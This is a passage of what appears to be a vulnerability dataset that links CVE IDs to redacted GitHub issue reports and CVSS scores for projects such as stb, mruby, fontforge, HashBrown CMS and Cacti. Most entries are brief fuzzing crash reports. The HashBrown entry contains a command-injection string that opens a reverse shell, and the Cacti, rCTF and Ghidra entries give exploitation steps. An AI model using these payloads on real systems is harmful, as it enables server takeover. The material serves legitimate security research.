  61186. "description": "XSS vulnerability: CVS lastlog filename not escaped. Describe the bug When the APITAG option is enabled, APITAG shows for directories in the directory view the log message of the most recently modified child thereof, along with the child file's name and revision number. Unfortunately, the child file's name is not properly HTML escaped. Steps to reproduce the behavior NUMBERTAG In a CVS repository, copy the APITAG backing file for any non dead versioned file into an otherwise empty subdirectory of the repository. ERRORTAG NUMBERTAG Ensure that APITAG is enabled in your APITAG file (restarting any relevant servers NUMBERTAG In APITAG visit the parent directory of the newly created file. APITAG will pass the name of your newly created file (minus the APITAG bit) to the browser without escaping that name for safe HTML transport. In this specific example, a APITAG alert dialog will appear with the message NUMBERTAG Expected behavior APITAG should relay the name of the last modified file, properly escaped.",
  61187. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N",
  61188. "severity": "LOW",
  61189. "baseScore": 3.5,
  61190. "impactScore": 2.5,
  61191. "exploitabilityScore": 0.9
  61192. },
  61193. {
  61194. "CVE_ID": "CVE-2020-5290",
  61195. "Issue_Url_old": "https://github.com/redpwn/rctf/issues/147",
  61196. "Issue_Url_new": "https://github.com/redpwn/rctf/issues/147",
  61197. "Repo_new": "redpwn/rctf",
  61198. "Issue_Created_At": "2020-03-29T07:04:38Z",
  61199. "description": "Session fixation vulnerability in /verify. Description There is a session fixation vulnerability in rCTF exploitable through the APITAG hash when making a request to the APITAG endpoint. Vulnerable code ERRORTAG Exploitation Scenario An attacker team could potentially steal flags by, for example, exploiting a stored XSS payload in a CTF challenge so that victim teams who solve the challenge are unknowingly (and against their will) signed into the attacker team's account. Then, the attacker can gain points / value off the backs of the victims. Reproduction Steps NUMBERTAG Create two teams: an attacker, and a victim. Sign into the victim's account NUMBERTAG Make an HTTP request to APITAG where APITAG is the attacker's team code NUMBERTAG Observe that you have been logged in as the attacker. Extra Details Commit that introduced the vulnerability URLTAG Potential solutions Instead of having the verification email link immediately sign users in, have it be purely for confirmation purposes. After opening the verification link and verifying the email address, the original registration page which is polling the server for updates would receive word that the email is verified. It would then log in without requiring a session ID from user input.",
  61200. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  61201. "severity": "MEDIUM",
  61202. "baseScore": 6.5,
  61203. "impactScore": 3.6,
  61204. "exploitabilityScore": 2.8
  61205. },
  61206. {
  61207. "CVE_ID": "CVE-2020-5303",
  61208. "Issue_Url_old": "https://github.com/tendermint/tendermint/issues/1696",
  61209. "Issue_Url_new": "https://github.com/tendermint/tendermint/issues/1696",
  61210. "Repo_new": "tendermint/tendermint",
  61211. "Issue_Created_At": "2018-06-06T09:48:53Z",
  61212. "description": "Bounding resource usage in Tendermint. General idea is overall understanding and control of resources used for processing of every kind of message. This is the preliminary thoughts based on discussions with MENTIONTAG RPC: public APIs, submit part. No limit on data length. We need to have limit on request size. We want to constrain number of open connections. Connections can be one shot (http) or persistent (websocket). For persistent connections, we want to limit number of outstanding requests in a period of time. If client submits over broadcast_commit then it is necessary in addition to constrain number of outstanding requests as each request requires creating request context so consumes resources. public APIs, query part. Rate limit number of calls for every endpoint. Bound response size. public APIs, subscribe. Bound number of open subscriptions. Peer connection management: persistent connections to k peers. We bound APITAG We don't accept more connections than this number. There is also a bound on number of outgoing connections. For each connection we want to constrain resources used per message type and put limit on message size. Question: Do we want to have global contract on resource usage, i.e., what part of available bandwidth will be used for Mempool messages, how much for consensus, fast sync, etc. The follow up question is how we can enforce this. Is this static setup or it should be adapted based on node state and the state of its peers. Question: Do we want to have separate connections for sending and receiving of messages? CPU: We want to know number of go routines and correlation with number of peers and number of client connections and subscriptions. Number of go routines should be bounded. Performance analysis of Tendermint should be done. We want to understand number and usage of routines, and what are the bottlenecks. Memory: Memory usage should be bounded and consistent. Profiling of memory usage is needed. Correlation with number of peers and number of client connections and subscriptions should be determined. Disk usage: We want to place constraint on reading/writing to disk.",
  61213. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
  61214. "severity": "LOW",
  61215. "baseScore": 3.7,
  61216. "impactScore": 1.4,
  61217. "exploitabilityScore": 2.2
  61218. },
  61219. {
  61220. "CVE_ID": "CVE-2020-5303",
  61221. "Issue_Url_old": "https://github.com/tendermint/tendermint/issues/3338",
  61222. "Issue_Url_new": "https://github.com/tendermint/tendermint/issues/3338",
  61223. "Repo_new": "tendermint/tendermint",
  61224. "Issue_Created_At": "2019-02-20T15:10:34Z",
  61225. "description": "p2p: sent next PEX request too soon. Some users are reporting seeing this error, potentially when talking to seeds. Properly functioning nodes should rate limit how often they send pex requests so they don't send them too frequently. It seems something about this logic is off. An example of this happening was reported in NUMBERTAG though it seems that issue is about a different problem.",
  61226. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
  61227. "severity": "LOW",
  61228. "baseScore": 3.7,
  61229. "impactScore": 1.4,
  61230. "exploitabilityScore": 2.2
  61231. },
  61232. {
  61233. "CVE_ID": "CVE-2020-5395",
  61234. "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/4084",
  61235. "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/4084",
  61236. "Repo_new": "fontforge/fontforge",
  61237. "Issue_Created_At": "2020-01-03T16:46:57Z",
  61238. "description": "Use after free (heap) in the APITAG function. Hi, While fuzzing APITAG with AFL, I found a heap use after free in the APITAG function, in sfd.c. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced in APITAG NUMBERTAG and with latest Git master by running: APITAG ERRORTAG",
  61239. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61240. "severity": "HIGH",
  61241. "baseScore": 8.8,
  61242. "impactScore": 5.9,
  61243. "exploitabilityScore": 2.8
  61244. },
  61245. {
  61246. "CVE_ID": "CVE-2020-5496",
  61247. "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/4085",
  61248. "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/4085",
  61249. "Repo_new": "fontforge/fontforge",
  61250. "Issue_Created_At": "2020-01-03T21:15:18Z",
  61251. "description": "Heap based buffer overflow in the APITAG function. Hi, While fuzzing APITAG with AFL, I found a heap based buffer overflow in the APITAG function, in splinesave.c. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced in APITAG NUMBERTAG and with latest Git master by running: APITAG ERRORTAG",
  61252. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61253. "severity": "HIGH",
  61254. "baseScore": 8.8,
  61255. "impactScore": 5.9,
  61256. "exploitabilityScore": 2.8
  61257. },
  61258. {
  61259. "CVE_ID": "CVE-2020-5497",
  61260. "Issue_Url_old": "https://github.com/mitreid-connect/OpenID-Connect-Java-Spring-Server/issues/1521",
  61261. "Issue_Url_new": "https://github.com/mitreid-connect/openid-connect-java-spring-server/issues/1521",
  61262. "Repo_new": "mitreid-connect/openid-connect-java-spring-server",
  61263. "Issue_Created_At": "2020-01-03T18:59:15Z",
  61264. "description": "Cross Site Scripting APITAG APITAG appears to be vulnerable to XSS here: ~~~ // get the info of the current user, if available (null otherwise) function APITAG { return APITAG } ~~~ APITAG is included in the page and is not encoded so malicious elements could be created. If the string APITAG appears in APITAG , the APITAG element will be closed and a new malicious APITAG can be created: ~~~ // get the info of the current user, if available (null otherwise) function APITAG { return APITAG APITAG APITAG alert NUMBERTAG APITAG APITAG APITAG APITAG alert NUMBERTAG APITAG APITAG EMAILTAG \",\"email_verified\":true}; } ~~~ FILETAG And the malicious APITAG is executed: FILETAG",
  61265. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  61266. "severity": "MEDIUM",
  61267. "baseScore": 6.1,
  61268. "impactScore": 2.7,
  61269. "exploitabilityScore": 2.8
  61270. },
  61271. {
  61272. "CVE_ID": "CVE-2020-6173",
  61273. "Issue_Url_old": "https://github.com/theupdateframework/tuf/issues/973",
  61274. "Issue_Url_new": "https://github.com/theupdateframework/python-tuf/issues/973",
  61275. "Repo_new": "theupdateframework/python-tuf",
  61276. "Issue_Created_At": "2020-01-08T17:09:34Z",
  61277. "description": "Potential APITAG for attacker that can create metadata files.... We received the report below about an attacker that can create many invalid signatures on a metadata file, delaying the moment when the client will determine the signature is not valid. This delay may be for at least a few minutes, but possibly could be longer especially if multiple files are impacted. Possible remediations include failing earlier (possibly immediately) if any signature is not valid. Credit to Erik Maclean Analog Devices, Inc. for reporting this issue. APITAG Details below.) Tracking ID: CVETAG Summary: Potential Client side Denial of Service Description: While maximum file size is restricted for downloading, the client may attempt to validate a large number of signatures. We have been able to add over NUMBERTAG copies of the same invalid signature into the APITAG file, which results in the client attempting to validate each one, spending several minutes on validation. The file size limit of APITAG is larger and may allow up to NUMBERTAG signatures, further increasing the amount of time spent in validation. Security Impact: Denial of Service Affected Version: Identified at commit APITAG suspect all versions. Credit: Erik Maclean Analog Devices, Inc.",
  61278. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  61279. "severity": "MEDIUM",
  61280. "baseScore": 5.3,
  61281. "impactScore": 1.4,
  61282. "exploitabilityScore": 3.9
  61283. },
  61284. {
  61285. "CVE_ID": "CVE-2020-6609",
  61286. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/179",
  61287. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/179",
  61288. "Repo_new": "libredwg/libredwg",
  61289. "Issue_Created_At": "2020-01-03T03:19:25Z",
  61290. "description": "Sever. Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwg2svg2 APITAG NUMBERTAG heap buffer overflow in read_pages_map PATHTAG POC: URLTAG ASAN says: ERRORTAG",
  61291. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61292. "severity": "HIGH",
  61293. "baseScore": 8.8,
  61294. "impactScore": 5.9,
  61295. "exploitabilityScore": 2.8
  61296. },
  61297. {
  61298. "CVE_ID": "CVE-2020-6617",
  61299. "Issue_Url_old": "https://github.com/nothings/stb/issues/864",
  61300. "Issue_Url_new": "https://github.com/nothings/stb/issues/864",
  61301. "Repo_new": "nothings/stb",
  61302. "Issue_Created_At": "2020-01-06T11:18:26Z",
  61303. "description": "assertion failure in stbtt__cff_int in stb_truetype.h. assertion failure in APITAG can be triggered by user supplied font file. APITAG poc: FILETAG result: ERRORTAG",
  61304. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61305. "severity": "HIGH",
  61306. "baseScore": 8.8,
  61307. "impactScore": 5.9,
  61308. "exploitabilityScore": 2.8
  61309. },
  61310. {
  61311. "CVE_ID": "CVE-2020-6618",
  61312. "Issue_Url_old": "https://github.com/nothings/stb/issues/866",
  61313. "Issue_Url_new": "https://github.com/nothings/stb/issues/866",
  61314. "Repo_new": "nothings/stb",
  61315. "Issue_Created_At": "2020-01-06T11:24:48Z",
  61316. "description": "heap overflow in stbtt__find_table in stb_truetype.h. heap overflow in line NUMBERTAG APITAG doesn't check any out of bound access, so heap overflow can be triggered here. APITAG poc: FILETAG result: ERRORTAG",
  61317. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61318. "severity": "HIGH",
  61319. "baseScore": 8.8,
  61320. "impactScore": 5.9,
  61321. "exploitabilityScore": 2.8
  61322. },
  61323. {
  61324. "CVE_ID": "CVE-2020-6619",
  61325. "Issue_Url_old": "https://github.com/nothings/stb/issues/863",
  61326. "Issue_Url_new": "https://github.com/nothings/stb/issues/863",
  61327. "Repo_new": "nothings/stb",
  61328. "Issue_Created_At": "2020-01-06T11:15:45Z",
  61329. "description": "assertion failure in stbtt__buf_seek in stb_truetype.h. assertion failure in APITAG can be triggered by user supplied font file. APITAG poc: FILETAG result: ERRORTAG",
  61330. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61331. "severity": "HIGH",
  61332. "baseScore": 8.8,
  61333. "impactScore": 5.9,
  61334. "exploitabilityScore": 2.8
  61335. },
  61336. {
  61337. "CVE_ID": "CVE-2020-6620",
  61338. "Issue_Url_old": "https://github.com/nothings/stb/issues/868",
  61339. "Issue_Url_new": "https://github.com/nothings/stb/issues/868",
  61340. "Repo_new": "nothings/stb",
  61341. "Issue_Created_At": "2020-01-06T11:29:19Z",
  61342. "description": "heap overflow in stbtt__buf_get8 in stb_truetype.h . APITAG has heap overflow vulnerability. APITAG poc: FILETAG result: ERRORTAG",
  61343. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61344. "severity": "HIGH",
  61345. "baseScore": 8.8,
  61346. "impactScore": 5.9,
  61347. "exploitabilityScore": 2.8
  61348. },
  61349. {
  61350. "CVE_ID": "CVE-2020-6621",
  61351. "Issue_Url_old": "https://github.com/nothings/stb/issues/867",
  61352. "Issue_Url_new": "https://github.com/nothings/stb/issues/867",
  61353. "Repo_new": "nothings/stb",
  61354. "Issue_Created_At": "2020-01-06T11:27:04Z",
  61355. "description": "heap overflow in APITAG in stb_truetype.h. APITAG don't have any bound check, so heap overflow can be triggered. APITAG APITAG poc: FILETAG result: ERRORTAG",
  61356. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61357. "severity": "HIGH",
  61358. "baseScore": 8.8,
  61359. "impactScore": 5.9,
  61360. "exploitabilityScore": 2.8
  61361. },
  61362. {
  61363. "CVE_ID": "CVE-2020-6622",
  61364. "Issue_Url_old": "https://github.com/nothings/stb/issues/869",
  61365. "Issue_Url_new": "https://github.com/nothings/stb/issues/869",
  61366. "Repo_new": "nothings/stb",
  61367. "Issue_Created_At": "2020-01-06T11:31:13Z",
  61368. "description": "heap overflow in stbtt__buf_peek8 in stb_truetype.h . heap overflow in APITAG . APITAG poc: FILETAG result: ERRORTAG",
  61369. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61370. "severity": "HIGH",
  61371. "baseScore": 8.8,
  61372. "impactScore": 5.9,
  61373. "exploitabilityScore": 2.8
  61374. },
  61375. {
  61376. "CVE_ID": "CVE-2020-6623",
  61377. "Issue_Url_old": "https://github.com/nothings/stb/issues/865",
  61378. "Issue_Url_new": "https://github.com/nothings/stb/issues/865",
  61379. "Repo_new": "nothings/stb",
  61380. "Issue_Created_At": "2020-01-06T11:20:15Z",
  61381. "description": "assertion failure in stbtt__cff_get_index in stb_truetype.h. assertion failure in stbtt__cff_get_index can be triggered by user supplied file. APITAG poc: FILETAG result: ERRORTAG",
  61382. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61383. "severity": "HIGH",
  61384. "baseScore": 8.8,
  61385. "impactScore": 5.9,
  61386. "exploitabilityScore": 2.8
  61387. },
  61388. {
  61389. "CVE_ID": "CVE-2020-6628",
  61390. "Issue_Url_old": "https://github.com/libming/libming/issues/191",
  61391. "Issue_Url_new": "https://github.com/libming/libming/issues/191",
  61392. "Repo_new": "libming/libming",
  61393. "Issue_Created_At": "2020-01-07T01:51:41Z",
  61394. "description": "heap overflow in decompile_SWITCH. export APITAG ./swftopython $poc FILETAG asan output ERRORTAG",
  61395. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61396. "severity": "HIGH",
  61397. "baseScore": 8.8,
  61398. "impactScore": 5.9,
  61399. "exploitabilityScore": 2.8
  61400. },
  61401. {
  61402. "CVE_ID": "CVE-2020-6629",
  61403. "Issue_Url_old": "https://github.com/libming/libming/issues/190",
  61404. "Issue_Url_new": "https://github.com/libming/libming/issues/190",
  61405. "Repo_new": "libming/libming",
  61406. "Issue_Created_At": "2020-01-07T00:53:16Z",
  61407. "description": "null pointer reference in APITAG swftophp $poc FILETAG asan output ERRORTAG",
  61408. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  61409. "severity": "MEDIUM",
  61410. "baseScore": 6.5,
  61411. "impactScore": 3.6,
  61412. "exploitabilityScore": 2.8
  61413. },
  61414. {
  61415. "CVE_ID": "CVE-2020-6630",
  61416. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1377",
  61417. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1377",
  61418. "Repo_new": "gpac/gpac",
  61419. "Issue_Created_At": "2020-01-02T00:45:04Z",
  61420. "description": "null pointer reference in gf_isom_get_media_data_size. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG asan output ERRORTAG",
  61421. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  61422. "severity": "MEDIUM",
  61423. "baseScore": 5.5,
  61424. "impactScore": 3.6,
  61425. "exploitabilityScore": 1.8
  61426. },
  61427. {
  61428. "CVE_ID": "CVE-2020-6631",
  61429. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1378",
  61430. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1378",
  61431. "Repo_new": "gpac/gpac",
  61432. "Issue_Created_At": "2020-01-02T00:49:55Z",
  61433. "description": "null pointer reference in gf_m2ts_stream_process_pmt. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG asan output ERRORTAG",
  61434. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  61435. "severity": "MEDIUM",
  61436. "baseScore": 5.5,
  61437. "impactScore": 3.6,
  61438. "exploitabilityScore": 1.8
  61439. },
  61440. {
  61441. "CVE_ID": "CVE-2020-6838",
  61442. "Issue_Url_old": "https://github.com/mruby/mruby/issues/4926",
  61443. "Issue_Url_new": "https://github.com/mruby/mruby/issues/4926",
  61444. "Repo_new": "mruby/mruby",
  61445. "Issue_Created_At": "2020-01-10T08:47:38Z",
  61446. "description": "heap use after free in hash_values_at in PATHTAG compile mruby in ubuntu NUMBERTAG bit with ASAN. poc: CODETAG ERRORTAG",
  61447. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  61448. "severity": "CRITICAL",
  61449. "baseScore": 9.8,
  61450. "impactScore": 5.9,
  61451. "exploitabilityScore": 3.9
  61452. },
  61453. {
  61454. "CVE_ID": "CVE-2020-6839",
  61455. "Issue_Url_old": "https://github.com/mruby/mruby/issues/4929",
  61456. "Issue_Url_new": "https://github.com/mruby/mruby/issues/4929",
  61457. "Repo_new": "mruby/mruby",
  61458. "Issue_Created_At": "2020-01-10T08:51:54Z",
  61459. "description": "stack overflow in mrb_str_len_to_dbl in APITAG build mruby in ubuntu NUMBERTAG bit with ASAN poc: CODETAG result: ERRORTAG",
  61460. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  61461. "severity": "CRITICAL",
  61462. "baseScore": 9.8,
  61463. "impactScore": 5.9,
  61464. "exploitabilityScore": 3.9
  61465. },
  61466. {
  61467. "CVE_ID": "CVE-2020-6840",
  61468. "Issue_Url_old": "https://github.com/mruby/mruby/issues/4927",
  61469. "Issue_Url_new": "https://github.com/mruby/mruby/issues/4927",
  61470. "Repo_new": "mruby/mruby",
  61471. "Issue_Created_At": "2020-01-10T08:49:02Z",
  61472. "description": "heap use after free in hash_slice in PATHTAG build mruby in ubuntu NUMBERTAG bit with ASAN poc: CODETAG result: ERRORTAG",
  61473. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  61474. "severity": "CRITICAL",
  61475. "baseScore": 9.8,
  61476. "impactScore": 5.9,
  61477. "exploitabilityScore": 3.9
  61478. },
  61479. {
  61480. "CVE_ID": "CVE-2020-6851",
  61481. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1228",
  61482. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1228",
  61483. "Repo_new": "uclouvain/openjpeg",
  61484. "Issue_Created_At": "2020-01-10T13:00:24Z",
  61485. "description": "Heap buffer overflow in libopenjp2. Hi, I found a heap buffer overflow that affects at least version NUMBERTAG and current master APITAG On a regular build of openjpeg (in my case, the one shipped by Arch Linux), it leads to a crash; when building the project with address sanitizer, I get the following report: ERRORTAG For the report, I built with Clang NUMBERTAG on Debian stable, using APITAG and APITAG , and calling APITAG with APITAG . The crashing input is available here FILETAG ~seba/openjpeg_poc . Since I believe this may be exploitable, I would like to request a CVE. Let me know if I can help with more information. Thank you!",
  61486. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  61487. "severity": "HIGH",
  61488. "baseScore": 7.5,
  61489. "impactScore": 3.6,
  61490. "exploitabilityScore": 3.9
  61491. },
  61492. {
  61493. "CVE_ID": "CVE-2020-6860",
  61494. "Issue_Url_old": "https://github.com/hoene/libmysofa/issues/96",
  61495. "Issue_Url_new": "https://github.com/hoene/libmysofa/issues/96",
  61496. "Repo_new": "hoene/libmysofa",
  61497. "Issue_Created_At": "2020-01-10T09:56:42Z",
  61498. "description": "Stack Buffer Overflow in mysofa2json. We found Stack Buffer Overflow in mysofa2json binary and mysofa2json is complied with clang enabling ASAN. Machine Setup APITAG POC : FILETAG ASAN Output ERRORTAG",
  61499. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61500. "severity": "HIGH",
  61501. "baseScore": 8.8,
  61502. "impactScore": 5.9,
  61503. "exploitabilityScore": 2.8
  61504. },
  61505. {
  61506. "CVE_ID": "CVE-2020-6948",
  61507. "Issue_Url_old": "https://github.com/HashBrownCMS/hashbrown-cms/issues/326",
  61508. "Issue_Url_new": "https://github.com/hashbrowncms/hashbrown-cms/issues/326",
  61509. "Repo_new": "hashbrowncms/hashbrown-cms",
  61510. "Issue_Created_At": "2020-01-12T08:00:45Z",
  61511. "description": "remote code execution vulnerability. In file PATHTAG await APITAG clone ' + url + ' ' + APITAG + ' '); The url, username, password and other parameters accept value without proper security check. If I set the git url to something like APITAG $(bash c 'bash i >& PATHTAG NUMBERTAG then when click media to trigger gitpull I can get a reverse shell.",
  61512. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  61513. "severity": "CRITICAL",
  61514. "baseScore": 9.8,
  61515. "impactScore": 5.9,
  61516. "exploitabilityScore": 3.9
  61517. },
  61518. {
  61519. "CVE_ID": "CVE-2020-6949",
  61520. "Issue_Url_old": "https://github.com/HashBrownCMS/hashbrown-cms/issues/327",
  61521. "Issue_Url_new": "https://github.com/hashbrowncms/hashbrown-cms/issues/327",
  61522. "Repo_new": "hashbrowncms/hashbrown-cms",
  61523. "Issue_Created_At": "2020-01-12T08:14:48Z",
  61524. "description": "vulnerability that editor user can change admin user's password. editor role user can change admin user's properties including password hash, salt and token. let's say you have NUMBERTAG users in db id name isadmin hash NUMBERTAG admin true aaaaaa NUMBERTAG editor false bbbbbb editor user can use the postuser function to change his password. Attacker can use this function to change the id and other parameters. If editor changed the id to NUMBERTAG post body)which belong to admin, then he can send another postuser request (set to NUMBERTAG in both post body and url) to overwrite admin's properties (since findone by id NUMBERTAG matches first row now) including hash, token and salt, also changed isadmin to false, static APITAG res) { let id = APITAG let properties = APITAG APITAG APITAG .then((user) => { let APITAG = APITAG 'users'); if(user.id == id || APITAG { // If the current user does not have the \"users\" scope, revert any sensitive properties APITAG { APITAG = APITAG APITAG = false; } return APITAG } return APITAG APITAG \"' + APITAG + '\" does not have scope \"user\"')); }) APITAG => { APITAG properties); <<<<<< accept id, and password value",
  61525. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  61526. "severity": "HIGH",
  61527. "baseScore": 8.8,
  61528. "impactScore": 5.9,
  61529. "exploitabilityScore": 2.8
  61530. },
  61531. {
  61532. "CVE_ID": "CVE-2020-6950",
  61533. "Issue_Url_old": "https://github.com/eclipse-ee4j/mojarra/issues/4571",
  61534. "Issue_Url_new": "https://github.com/eclipse-ee4j/mojarra/issues/4571",
  61535. "Repo_new": "eclipse-ee4j/mojarra",
  61536. "Issue_Created_At": "2019-05-12T13:33:12Z",
  61537. "description": "Multiple Path Traversal security issues. There are a couple places that allow manipulating resource requests to disclose arbitrary files under application context. These are tested with Mojarra NUMBERTAG and works under default configuration NUMBERTAG Resource contracts APITAG URLTAG . Under a branch condition, contract name is fetched from an http parameter and doesn't go through any filtering. The resource base path is later concatenated from it and can be abused to return unwanted resource like PATHTAG Another place that has the same vulnerable code is APITAG URLTAG NUMBERTAG Locale prefix The patch for URLTAG is incomplete. APITAG after the check URLTAG still contains tainted data and if the application doesn't declare APITAG in a resource bundle, the application still continues to return that tainted input.",
  61538. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  61539. "severity": "MEDIUM",
  61540. "baseScore": 6.5,
  61541. "impactScore": 3.6,
  61542. "exploitabilityScore": 2.8
  61543. },
  61544. {
  61545. "CVE_ID": "CVE-2020-6958",
  61546. "Issue_Url_old": "https://github.com/NationalSecurityAgency/ghidra/issues/943",
  61547. "Issue_Url_new": "https://github.com/nationalsecurityagency/ghidra/issues/943",
  61548. "Repo_new": "nationalsecurityagency/ghidra",
  61549. "Issue_Created_At": "2019-08-27T14:21:52Z",
  61550. "description": "XXE Vulnerability in APITAG of YAJSW affects Ghidra Server. Describe the bug XXE vulnerability in YAJSW\u2019s APITAG affects Ghidra Server. An insecure way to parse XML input was found in APITAG class from Yet Another Java Service Wrapper used by Ghidra (up to latest version). To Reproduce Steps to reproduce the behavior NUMBERTAG Create an XXE payload file and set the extension of the file to \".jnlp NUMBERTAG Go to PATHTAG NUMBERTAG Modify \"WRAPPER_CONF\" value to point to the \".jnlp\" file NUMBERTAG Run APITAG using \"$ sudo APITAG start NUMBERTAG E exploit in the \".jnlp\" file gets executed Expected behavior Extended XML Entities should be disabled. Environment (please complete the following information): OS: Kali Linux, Debian NUMBERTAG kali NUMBERTAG Java Version NUMBERTAG Ghidra Version NUMBERTAG Additional context I understand the vulnerable code is actually part of a separate library, however I considered this of interest and I suggest adding a filter so no \".jnlp\" configuration files are allowed as values for \"WRAPPER_CONF\", at least until YAJSW patches this problem. More APITAG FILETAG",
  61551. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  61552. "severity": "CRITICAL",
  61553. "baseScore": 9.1,
  61554. "impactScore": 5.2,
  61555. "exploitabilityScore": 3.9
  61556. },
  61557. {
  61558. "CVE_ID": "CVE-2020-7041",
  61559. "Issue_Url_old": "https://github.com/adrienverge/openfortivpn/issues/536",
  61560. "Issue_Url_new": "https://github.com/adrienverge/openfortivpn/issues/536",
  61561. "Repo_new": "adrienverge/openfortivpn",
  61562. "Issue_Created_At": "2020-01-14T13:12:17Z",
  61563. "description": "Security Contact. Dear mantainers, As part of my work at APITAG Security Lab, I have identified some security issues in openfortivpn and I would like to know the preferred way of communicating said issues. Best regards.",
  61564. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  61565. "severity": "MEDIUM",
  61566. "baseScore": 5.3,
  61567. "impactScore": 1.4,
  61568. "exploitabilityScore": 3.9
  61569. },
  61570. {
  61571. "CVE_ID": "CVE-2020-7054",
  61572. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/200",
  61573. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/200",
  61574. "Repo_new": "mz-automation/libiec61850",
  61575. "Issue_Created_At": "2020-01-12T17:21:08Z",
  61576. "description": "heap overflow when parsing APITAG in APITAG in PATHTAG When libiec NUMBERTAG parsing type APITAG , it doesn't check variable APITAG . So we can provide a larger number for APITAG , then memory copy from buffer + APITAG NUMBERTAG lead to heap overflow. APITAG poc: FILETAG result: ERRORTAG",
  61577. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61578. "severity": "HIGH",
  61579. "baseScore": 8.8,
  61580. "impactScore": 5.9,
  61581. "exploitabilityScore": 2.8
  61582. },
  61583. {
  61584. "CVE_ID": "CVE-2020-7058",
  61585. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3186",
  61586. "Issue_Url_new": "https://github.com/cacti/cacti/issues/3186",
  61587. "Repo_new": "cacti/cacti",
  61588. "Issue_Created_At": "2020-01-14T22:53:20Z",
  61589. "description": "Critical: Remote Code Execution via string/command type Input String. Describe the bug Input validation error in FILETAG leads to Remote Code Execution via Input String APITAG edit actions. By default, Cacti was installed with several Data Input Methods. Some of them was created using APITAG input type. An attacker will be able to edit the Input String to insert malicious code and take control of the server. To Reproduce Steps to reproduce the behavior NUMBERTAG After logged in, navigate to Data Collection > Data Input Methods > Unix Ping Host NUMBERTAG By default, Input String was specified as: APITAG . Let's append a malicious perl script in front of current script: CODETAG NUMBERTAG By default, Unix Ping Host data input method is being used by Unix Ping Latency Graph template. This means we can create Unix Ping Latency in current device and gain Remote Code Execution Expected behavior By default, Ping Host works as a feature to check if a host is up/down. With the malicious code appended into the Input String, the server will make a call back to Attacker's machine first. Screenshots If applicable, add screenshots to help explain your problem. Malicious code: URLTAG Create new graph in device: URLTAG Reverse shell connection: URLTAG Desktop (please complete the following information): OS: Kali Linux, Ubuntu Browser : Firefox, Chrome Version: Firefo NUMBERTAG Chrome NUMBERTAG Remediation I would think about two NUMBERTAG solutions 